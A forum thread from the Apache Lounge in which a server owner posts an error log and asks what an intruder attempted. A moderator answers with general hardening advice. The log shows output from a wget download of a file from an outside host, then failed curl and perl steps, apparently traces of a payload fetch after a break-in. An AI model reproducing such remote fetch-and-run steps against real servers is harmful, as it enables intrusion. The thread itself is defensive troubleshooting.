Keep Server Online
If you find the Apache Lounge, the downloads and overall help useful, please express your satisfaction with a donation.
or
A donation makes a contribution towards the costs, the time and effort that's going in this site and building.
Thank You! Steffen
Your donations will help to keep this site alive and well, and continuing building binaries. Apache Lounge is not sponsored.
| |
|
 Topic: Log Help |
|
| Author |
|
rewesh
Joined: 10 Sep 2010
Posts: 2
|
 Posted: Fri 10 Sep '10 19:53 Post subject: Log Help |
 |
|
I have this portion of the log file, First, what is someone trying to do?
Second in the middle of the log there are some line that i can not understand, the one which " http://www.bubububu.007sites.com/c
=> `c'
Resolving www.bubububu.007sites.com... 74.114.116.107
Connecting to www.bubububu.007sites.com|74.114.116.107|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,745 (28K) [text/html]
0K .......... .......... ........ 100% 77.45 KB/s
09:45:49 (77.45 KB/s) - `c' saved [28745/28745]" Does that mean that a file has been downloaded or uploded to my server and where , i can not find any files or do not have any files with that name on my server.
And also these two lines
"sh: curl: command not found
perl: no process killed
"
Thanks
| Code: |
[Tue Sep 07 16:44:16 2010] [error] [client 67.195.112.175] File does not exist: /var/www/mysoundcage/robots.txt
[Tue Sep 07 17:34:22 2010] [error] [client 208.191.153.193] File does not exist: /var/www/mysoundcage/cgi-bin
[Tue Sep 07 17:34:22 2010] [error] [client 208.191.153.193] script not found or unable to stat: /usr/lib/cgi-bin/awstats.pl
[Wed Sep 08 09:37:31 2010] [error] [client 95.108.150.235] File does not exist: /var/www/mysoundcage/robots.txt
--09:45:47-- http://www.bubububu.007sites.com/c
=> `c'
Resolving www.bubububu.007sites.com... 74.114.116.107
Connecting to www.bubububu.007sites.com|74.114.116.107|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,745 (28K) [text/html]
0K .......... .......... ........ 100% 77.45 KB/s
09:45:49 (77.45 KB/s) - `c' saved [28745/28745]
sh: curl: command not found
perl: no process killed
[Wed Sep 08 12:09:45 2010] [error] [client 199.172.169.86] Client sent malformed Host header
[Wed Sep 08 12:40:49 2010] [error] [client 89.121.253.227] File does not exist: /var/www/mysoundcage/phpmyadmin
|
Modnote: I killed all the crap from log file. Please read the forum rules! |
|
| Back to top |
|
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7371
Location: Germany, Next to Hamburg
|
| Posted: Tue 14 Sep '10 23:38 Post subject: |
|
|
| I guess someone might broke in server and executed some command via script. Or you use a software / script that do that things. |
|
| Back to top |
|
rewesh
Joined: 10 Sep 2010
Posts: 2
|
| Posted: Wed 15 Sep '10 6:55 Post subject: |
|
|
Sorry for posting a big portion of the log but it was to show the amount of tries so it can help someone in the diagnosis.
No i do not have a script or a software. So does anyone understand from that log if the attacker is trying to upload a file or download and has it been a success or not. and how to prevent this repeated attack. Thanks |
|
| Back to top |
|
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7371
Location: Germany, Next to Hamburg
|
| Posted: Wed 15 Sep '10 22:06 Post subject: |
|
|
Best practice to keep hackers outside is to update your OS as soons there is an update and use software / scripts you trust and keep it also up to date. Secondly run only less daemons on the server as possible. Don't use unsecure / unencrypted services you connect to. I won't call myself a linux expert. So you better ask there how to secure the linux.
Questions about apache are here welcome  |
|
| Back to top |
|
|
|
|
|
|
